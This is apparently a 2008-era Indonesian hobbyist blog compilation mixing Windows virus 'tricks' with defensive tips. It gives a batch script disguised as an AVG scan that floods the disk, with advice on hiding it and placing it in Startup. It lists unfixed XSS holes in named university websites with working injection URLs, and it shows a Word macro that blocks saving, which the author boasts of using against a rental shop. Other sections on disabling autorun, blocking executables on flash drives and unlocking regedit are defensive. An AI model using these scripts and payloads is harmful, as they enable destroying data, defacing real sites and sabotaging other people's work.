Tapi ini cuma buat pembelajaran lho, sebenarnya saya hanya ingin menerangkan bagaimana berbahayanya sebuah file .Bat. Sebenarnya artikel ini sudah jadoel banget, sudah banyak mungkin yang menulis artikel mirip-mirip begini. Ya maklum trik ini sudah ada sejak adanya MSDOS, karena trik ini akan menggunakan DOS. Tapi yasudahlah tidak apa. Langsung saja kita mulai..

Membanjiri Hardisk dengan Satu Kali Klik.

Pertama coba buka notepad.

Ketik script berikut :

—————————————————

@echo off

:awal
TYPE %WINDIR%\explorer.exe >> %WINDIR%\AVGguard.exe
cls

echo.
echo AVG Control Guard
echo Scanning this Computer
echo.
echo Press CTRL+C if process not Responding.
echo and answer YES.
echo —————————————
echo thanks : www.avg.com
goto awal

—————————————————

Save dengan nama Virus.bat (atau nama lain, sesuka anda) lalu coba klik 2 kali file tersebut, maka kira – kira akan tampil seperti berikut :

Script tersebut akan membuat sebuah file dengan nama AvgGuard.exe di C:\windows\system32.

Nama bisa anda ganti di Script, sebisa mungkin buat nama file yang susah di tebak, misal winlogon.dll, winId.dll atau wind32.txt, ya pokoknya menyerupai file-file milik windows(agar sulit dicari).

Coba lihat ukuran file AvgGuard tersebut, besar sekali bukan ?

Besar ukuran file tersebut tergantung dari lama anda membiarkan program tersebut berjalan ! Jika tadi anda buru – buru menekan CTRL+C maka ukuran file mungkin kecil.

Itu karena program itu akan memasukan file explorer.exe ke dalam file AvgGuard.exe yang dibuat saat program dijalankan, terus menerus dimasukan sampai anda menekan CTRL+C, Jadi jika anda tidak menekan CTRL + C maka file explorer.exe akan dimasukan terus ke dalam file AvgGuard.exe, dan bayangkan berapa ukuran file tersebut nantinya.

Bisa – bisa hardisk Penuh.

Lebih bahaya lagi kalau file tersebut diletakkan si Startup, maka setiap komputer di hidupkan maka hardisk akan berkurang ruang kosongnya.

Bahaya Sekali, jadi saya sarankan agar tidak di gunakan untuk hal – hal buruk yach, Kecuali kepepet hehee

Sekian….

Selamat mencoba.

1. Universitas Islam Sunan Kalijaga Yogyakarta.
   http://uin-suka.ac.id.
   
   // Celah XSS di Situs Universitas Islam Sunan Kalijaga Yogyakarta ( http://uin-suka.ac.id ) yang dapat menyebabkan pencurian password, deface, pencurian cookies, redirect suatu halaman web, dll.URL : http://uin-suka.ac.id.Last Checked : 24/08/2008.Status : UNFIXED...o00( Screenshoot Click Here…

   atau Copy-Paste URL berikut ke address bar browser kamu :
   http://www.uin-suka.ac.id/hasil_pencarian.php?textfield=%3Ccenter%3E%3Cmarquee%3E%3Ch1%3EXSS+Found+by+Izul+Cyber+Cafe%3C%2Fh1%3E%3C%2Fmarquee%3E%3Cimg+src%3Dhttp%3A%2F%2Fizul.site88.net%2Fizul-images%2Fbannerr.gif%3E%3Cbr%3Einformasi%20palsu%20disini%3Cbr%3Einformasi%20palsu%20disini%3Cbr%3Einformasi%20palsu%20disini%3Cbr%3Einformasi%20palsu%20disini%3C/center%3E%3Cnoscript%3E&Submit=Cari

2. Universitas Islam Sunan Kalijaga Yogyakarta.
   http://uin-suka.ac.id.
   
   // Celah XSS di Situs Universitas Islam Sunan Kalijaga Yogyakarta ( http://uin-suka.ac.id ) yang dapat menyebabkan pencurian password, deface, pencurian cookies, redirect suatu halaman web, dll.
   URL : http://uin-suka.ac.id.
   Last Checked : 24/08/2008.Status : UNFIXED
   ...o00( Screenshoot Click Here…
   atau Copy-Paste URL berikut ke address bar browser kamu :
   http://www.uin-suka.ac.id/hasil_pencarian.php?textfield=%3Ccenter%3E%3Cmarquee%3E%3Ch1%3EXSS+Found+by+Izul+Cyber+Cafe%3C%2Fh1%3E%3C%2Fmarquee%3E%3Cimg+src%3Dhttp%3A%2F%2Fizul.site88.net%2Fizul-images%2Fbannerr.gif%3E%3Cbr%3Einformasi%20palsu%20disini%3Cbr%3Einformasi%20palsu%20disini%3Cbr%3Einformasi%20palsu%20disini%3Cbr%3Einformasi%20palsu%20disini%3C/center%3E%3Cnoscript%3E&Submit=Cari

3. Universitas Lambung Mangkurat.

   http://unlam.ac.id

   

   //Gambar Celah XSS di situs Universitas Lambung Mangkurat ( http://unlam.ac.id ).

   Developer : http://unlam.ac.id.

   Last Checked : 24/08/2008.

   Status : UNFIXED.

4. Universitas Andalas.

   http://unand.ac.id

   

   //Gambar Celah XSS di situs Universits Andalas Padang ( http://unand.ac.id ).

   Developer : http://unand.ac.id.

   Last Checked : 24/08/2008.

   Status : UNFIXED.

5. Universitas Jendral Soedirman.http://unsoed.ac.id

   

   //Gambar Celah XSS di situs Jendral Soedirman ( http://unsoed.ac.id ).

   Developer : http://unsoed.ac.id.

   Last Checked : 24/08/2008.

   Status : UNFIXED.

6. Universitas Sanata Dharma Yogyakarta.

   http://usd.ac.id

   

   //Gambar Celah XSS di situs Sanata Dharma ( http://usd.ac.id ).

   Developer : http://usd.ac.id.

   Last Checked : 24/08/2008.

   Status : UNFIXED.

7. Universitas Airlangga.
   http://unair.ac.id
   
   //Gambar Celah XSS di situs Universitas Airlangga ( http://unair.ac.id ).Developer : http://unair.ac.id.Last Checked : 24/08/2008.Status : UNFIXED.
8. Institut Teknologi Nasional Malang.
   http://itn.ac.id.
   
   Developer ::http://www.itn.ac.id.
   Last Checked :: 24/08/2008.
   Status :: UNFIXED
9. Perpustakan Gunadarma.

   http://library.gunadarma.ac.id

   
   Developer : http://www.gunadarma.ac.id.
   Last Chacked : 25/08/2008.
   Status : UNFIXED.
   ..o00( ScreenShoot :: Click Here…….
   Atau COPY-PASTE URL berikut ke address bar Browser kamu..
   http://library.gunadarma.ac.id/index.php?appid=audiovisual⊂=index&cari=%3Cmarquee%3E%3Ch2%3E%3Cfont+color%3Dred%3EXSS+Found+by+Izul+Cyber+++Cafe%3C%2Ffont%3E%3C%2Fh2%3E%3C%2Fmarquee%3E%3Cbr%3E%3Cb%3Ehttp%3A%2F%2FIzul.co.cc%3C%2Fb%3E%3Cbr%3E%3Ca+href%3Dhttp%3A%2F%2Fizul.co.cc%3E%3Cimg+++src%3Dhttp%3A%2F%2Fizul.site88.net%2Fizul-images%2Fbannerr.gif%3E%3C%2Fa%3E%3Cbr%3E%3Cb%3EInformasi+palsu+dapat+ditulis+disini%3Cbr%3E%3Cb%3EInformasi+palsu+++dapat+ditulis+disini%3Cbr%3E%3Cb%3EInformasi+palsu+dapat+ditulis+disini%3Cbr%3E%3Cnoscript%3E&jenis=video&kriteria=judul&operator=all

File penting hilang ?

Jenuh selalu mengupdate Antivirus ?

Pekerjaan jadi terhambat ?

Artikel ini akan membantu anda untuk mulai terhindar dari virus khususnya virus lokal. Kebanyakan virus yang ada saat ini menyebar menggunakan Flasdisk dan Disket.

Bagaimana sih sebenarnya, kenapa virus bisa menyebar dengan Flash Disk/Disket ?

Sebaiknya terlebih dahulu anda membaca artikel Mematikan Autorun.

Kalau dengan cara Mendisable Autorun, File Exe yang ada di dalam Flash disk masih bisa jalan kalau anda melakukan klik double file .exe virus yang ada di Flasdisk/Disket.

Virus biasanya berbentuk menyerupai Folder, atau File Office atau MP3 untuk menipu kita.

Untuk mencegah file .exe dapat berjalan di FlashDisk/Disket walaupun di “double click” maka sebaiknya kita melakukan pencegahan dengan melarang file exe berjalan dari Flashdisk/Disket.

Caranya :

+ Start - Control Panel – Administrative Tools – Local Security Policy.

+ Klik tanda panah di Software Restriction Policies.

+ Lalu klik kanan pada Additonal Rules – pilih New Path Rules.

+ Pada jendela New Path Rules yang muncul, Tekan tombol Browse dan cari lokasi Flashdisk pada bagian Path.

Pilih Disallow pada Security Level.

Dan Tuliskan keterangan pada bagian Description.

Lalu klik OK.

Kalau anda sering manancapkan dua buah Flashdisk maka lakukan hal ini 2 kali, tapi pada bagian Path nya cari lokasi Flashdisk yang lain contoh : G atau H.

Untuk DIsket pada bagian Path ganti dengan A:/

Selesai…

Nah Sekarang coba jalankan File Exe apa saja yang ada di Flashdisk anda, maka akan muncul pesan seperti berikut.

Yang melarang file exe untuk bisa berjalan dari Flashdisk.

Klik gambar untuk memperbesar

Maka sekarang tidak perlu takut untuk melakukan klik double pada File Exe yang ada di Flashdisk karena tidak akan bisa berjalan, silahkan tancapkan Flashdisk tanpa perlu takut terkena Virus lagi.

Dengan 2 cara :

Mematikan Autorun Dan Mencegah File untuk dieksekusi dari Flashdisk maka kemungkinan anda terkena virus walaupun tanpa antivirus semakin menipis.

Satu lagi, artikel ini baik juga digunakan oleh warnet atau rental yang dipakai oleh banyak orang yang sering memakai Flashdisk/Disket.

/* jadul banget Disket */

Bubbye…….

Keep Learning and Happy Trying….

Mangapa harus mematikan AUTORUN ?

Pernah tidak ketika anda memasukan sebuah CD ke CD Rom anda, seketika program yang ada di CD itu langsung jalan.

Contoh ketika anda memasukan CD Windows XP ke Cd Rom..Maka otomatis Windows akan menjalankan’a tanpa perlu kita mengklik di Drive Cd Rom terlebih dahulu.
Hal itu dikarenakan ada file Autorun.inf di dalam CD Windows tersebut, yang berisi script/perintah untuk menjalankan program execute (.exe) yang ada di CD itu.

Barikut contoh isi dari file Autorun.inf.

[AutoRun]
open=setup.exe

Yang artinya akan menjalankan file Setup.exe setiap kali anda masukan CD

Bagitu juga dengan Flash Disk atau Disket yang terkena Virus.

Ketika anda mencolokan hehe bahasa apaan tu??

Ya ketika anda memasang FlashDisk anda ke USB maka otomatis virus akan menyebar ke komputer anda. Karena biasanya virus membuat file Autorun.inf ke dalam FlasDisk yang terinfeksi. Jadi memudahkan penyebarannya ke Komputer lain.

Jadi sebaiknya matikan Autorun di komputer anda.
Caranya :

1. Start – Run – Ketik Gpedit.msc.
2. Pilih Administrative Template yang ada di Pilihan paling bawah dari User Configuration.
3. Pilih System.
4. Lalu di Kolom sebelah kanan double click di Turn Off Autorun.
5. Pilih Enabled.
   di bagian Turn off Autoplay on : pilih All drives.

   Jadi mulai sekarang setiap anda memasukan CD ke CD-Rom atau mencolokan Flashdisk maka tidak akan otomatis jalan.
   Hal ini termasuk langkah awal terhindar dari Virus.

   

6. Klik Apply dan Selesai.

Peringatan :

Satu lagi Tips agar terhindar dari Virus yaitu :Ketika ingin membuka Drive Cd-Rom atau Flashdisk jangan langsung mengklik Double di Drive yang bersangkutan.
Tapi Klik kanan lalu pilih Open.
Hal ini mencegah Virus untuk dijalankan ketika anda membuka isi FlashDisk atau CD-Rom.

——//—————-

SeeYuuuu

Keep Learning and Happy Trying.

((– Izul Cyber Cafe –))

Tampilan / pesan yang muncul jika Regedit di Kunci adalah sebagai berikut.

Nah untuk mengembalikan Regitry yang dikunci oleh Virus ada banyak cara.
saya akan mencoba dalam berbagai macam cara.

:: CARA 1.

* Buka Notepad.
* Tuliskan Script berikut.

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\System]
“DisableRegistryTools”=dword:00000000

* Simpan dengan nama unlock.reg.
* Jalankan dengan mendouble click file .reg tersebut….
* Coba buka Regedit…
* TARAA……Regedit berhasil terbuka.

:: CARA 2.

Menggunakan script .Inf

* Buka Notepad.
* Tulis script berikut.

[Version]

Signature=”$Chicago$”
Provider=IzulCybeCafe

[DefaultInstall]
AddReg=UnhookRegKey

[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”"”%1″” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”"”%1″” %*”
HKCU, Software\Microsoft\Windows\CurrentVersion\ Policies\System,DisableRegistryTools,0×00000020,0

* Simpan dengan nama unlock.inf.
* Klik kanan file .inf tersebut lalu pilih Install.
* Buka Regedit.
* TaRaaa….Regedit berhasil dibuka kembali.

:: Cara 3.

Menggunakan VBScript.

* Buka Notepad.
* Tuliskan script berikut, bisa di copy langsung, tapi lebih baik di ketik sendiri.

Dim oWSH:
Set oWSH = CreateObject(“WScript.Shell”)

on error resume Next

oWSH.RegDelete(“HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\ Policies\System\DisableRegistryTools”)

NB : tulisan sesudah oWSH.RegDelete harus nyambung semua.

* Save dengan nama unlock.vbs.
* Klik ganda file tersebut.
* Sekarang coba jalankan Regedit.
* Tara….Regedit berhasil terbuka.

:: Cara 4.

Menggunakan Software Bantuan.

Bisa menggukan software UTIL.exe.
Bisa di Download di bagian Download di situs ini.

* Jalankan Util dengan mengklik double UTIL.exe.
* Klik Tab Tweak2.
* Hilangkan tanda ceklis di pilihan Disable registry editing.
* Klik Tombol Apply.

* Sekarang Coba buka Regedit anda…bisa langsung mengklik tombol Regedit disebelah tombol Apply.
* Tara…ah masak taraaa…terus ekspresi nya…Ganti donk…
* Horeee……Regedit sudah berhasil dibuka…….He..gak penting banget.

NB : Software Util ini juga bisa digunakan untuk membuka Task Manager yg terkunci, menyembunyikan Drive, dll.
coba-coba aja sendiri.

:: Cara 5.

Cari sendiri….Banyak software yang lain selain UTIL.

Trik ini nantinya akan menimbulkan efek gak bisa nge-save di Microsoft Word.
Trik jadul banget sih..tp gpp

Oke kita mulai aja.

1. Buka Microsoft Word *pada tau kan caranya*.
2. Klik menu Tools – pilih submenu Macro – Macros. atau tekan ctrl+F8.
3. Pada jendela yg muncul isi Macro Name dengan : FileSave.
4. Klik Create.
5. Muncul Visual Basic Editor.
6. Dari script yg muncul, hapus text yg berwarna merah, yg berada diantara
   Sub FileSave( ) dan End Sub.
7. Ganti dengan pesan yg akan anda munculkan..Contoh:
   Sub FileSave ( )
   Msgbox ” Hallo, Selamat ya…Komputer anda telah sukses terkena virus”, vbOKonly, “Virus IzulCyberCafe”
   End Sub.
8. Lalu klik Icon Biru Micrisoft Word yg ada di kiri atas untuk kembali lagi ke Microsoft Word.
9. Di Microsoft Word buat Document Baru, Lalu ketikan yg ingin anda ketik, lalu simpan dengan mengklik File – Save atau CTRL + S atau mengklik icon disket yg ada di ToolBar,
   Apa yg terjadi?? maka akan muncul Pesan seperti yg anda buat di Langkah ke-7.

Lumayan pernah gw gunain untuk ngerjain rental…….rental yg mahal harga sewanya.
Ngetik di rental, Pas udah ngetik berjam2, Buru-2 gw save di disket atau skarang FlashDisk, trus gunain de script ini..
Trus pura2 gak bisa nge-save, soalnya setiap mau nge-save muncul pesan.

Kerugian yg diakibatkan bukan tanggunan Gw.